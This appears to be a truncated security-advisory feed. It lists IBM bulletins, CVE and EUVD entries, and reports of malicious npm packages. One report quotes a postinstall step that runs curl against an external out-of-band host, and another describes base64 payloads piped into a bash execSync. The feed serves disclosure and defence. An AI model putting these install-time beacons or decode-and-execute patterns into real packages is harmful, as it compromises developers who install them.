Security Bulletin: Multiple vulnerabilities affect IBM Db2® on Cloud Pak for Data, and Db2 Warehouse on Cloud Pak for Data.
Summary: IBM has released the below fix for IBM Db2® on Cloud Pak for Data and Db2 Warehouse on Cloud Pak for Data in response to multiple vulnerabilities found in multiple components. This bulletin identifies the steps to take to address the vulnerabilities. Vulnerability Details...
Security Bulletin: Multiple Vulnerabilities affect IBM Decision Optimization for Cloud Pak for Data.
Summary: Multiple Vulnerabilities were addressed in IBM Decision Optimization for Cloud Pak for Data version 5.3.1 patch 6. Vulnerability Details: CVEID: CVE-2026-34477. DESCRIPTION: The fix for CVE-2025-68161 (https://logging.apache.org/security.html#CVE-2025-68161) was incomplete: it addressed hostname...
Security Bulletin: Multiple vulnerabilities in IBM MQ Operator and Queue manager container images
Summary: Multiple vulnerabilities were addressed in IBM MQ Operator and Queue manager container images. Vulnerability Details: CVEID: CVE-2026-27142. DESCRIPTION: Actions which insert URLs into the content attribute of HTML meta tags are not escaped. This can allow XSS if the meta tag also has an...
re
⚡ REVERSE ENGINEERING & BINARY EXPLOITATION ⚡ Welcome to my p...
Security Bulletin: IBM Verify Identity Protection Self-Hosted is affected by multiple vulnerabilities
Summary: Security Vulnerabilities were addressed in IBM Verify Identity Protection Self-Hosted. Vulnerability Details: CVEID: CVE-2025-66418. DESCRIPTION: urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.24 and prior to 2.6.0, the number of links in the decompression...
CVE-2026-12644
Versions of the package ts-deepmerge before 8.0.0 are vulnerable to Uncaught Exception due to the improper handling of built-in Object.prototype methods such as toString, valueOf. When user-controlled input contains these keys with non-function values, the resulting merged object becomes broken —...
imagemagick-gs-delegate-hijack-poc
ImageMagick Ghostscript Delegate Search Path PoC This reposit...
CVE-2026-12644
The CVE affects ts-deepmerge before version 8.0.0. The vulnerability stems from improper handling of built-in Object.prototype methods (e.g., toString, valueOf) during merging. If user-controlled input supplies these keys with non-function values, the merged object can break and throw a TypeError...
EUVD-2026-37991
Versions of the package ts-deepmerge before 8.0.0 are vulnerable to Uncaught Exception due to the improper handling of built-in Object.prototype methods such as toString, valueOf. When user-controlled input contains these keys with non-function values, the resulting merged object becomes broken —...
Malicious code in electron-internal-utils (npm)
Source: amazon-inspector e07ff16a8f4a44a8ccfc2f6f2a91eee6dbd3d1de9f1c4d6ca95e0e48999202ef On npm install, package.json's postinstall script executes curl http://9ph8dp.ceye.io, an out-of-band DNS/HTTP interaction service controlled by the...
MAL-2026-6186 Malicious code in electron-internal-utils (npm)
Source: amazon-inspector e07ff16a8f4a44a8ccfc2f6f2a91eee6dbd3d1de9f1c4d6ca95e0e48999202ef On npm install, package.json's postinstall script executes curl http://9ph8dp.ceye.io, an out-of-band DNS/HTTP interaction service controlled by the...
Malicious code in eyee (npm)
Source: amazon-inspector 743696e9409c97e89816b050f0346b86446464fdbaeead6ae49ddabf50a082ba On require/run, eyee auto-executes main package.json sets main=cdpinject.js and the bottom of the file invokes main unless --stop/--detach is passed...
MAL-2026-6189 Malicious code in eyee (npm)
Source: amazon-inspector 743696e9409c97e89816b050f0346b86446464fdbaeead6ae49ddabf50a082ba On require/run, eyee auto-executes main package.json sets main=cdpinject.js and the bottom of the file invokes main unless --stop/--detach is passed...
Malicious code in mjs-eslint-helper (npm)
Source: amazon-inspector 3320fa37492448acdf24a86f8a8735a3fc4d3b329ad156e299a8089df39e2f28 The package decodes base64 string literals via Buffer.from..., 'base64'.toString and pipes the resulting content into execSync'bash...' and...
MAL-2026-6190 Malicious code in mjs-eslint-helper (npm)
Source: amazon-inspector 3320fa37492448acdf24a86f8a8735a3fc4d3b329ad156e299a8089df39e2f28 The package decodes base64 string literals via Buffer.from..., 'base64'.toString and pipes the resulting content into execSync'bash...' and...
SUSE CVE-2026-6040
A heap use-after-free existed when importing the blank-width characters of an ODF number format. A position value read from the document was not checked against the length of the format-code string, so a malformed number format could be processed against memory outside that string. In fixed...
EUVD-2026-37967
HTML injection in pgAdmin 4's cloud deployment module. The verifycredentials, deploy, regions, and update-server endpoints under /rds/, /azure/, /google/, and the top-level /cloud/ blueprint propagated AWS / Azure / Google SDK exception text — and the related file-resolution and database-commit...
EUVD-2026-37964
SQL injection in pgAdmin 4's named restore point endpoint POST /browser/server/restorepoint/gid/sid. The user-supplied 'value' field was interpolated directly into the SQL string with str.format instead of being passed as a bound parameter, allowing an authenticated pgAdmin user with a connected...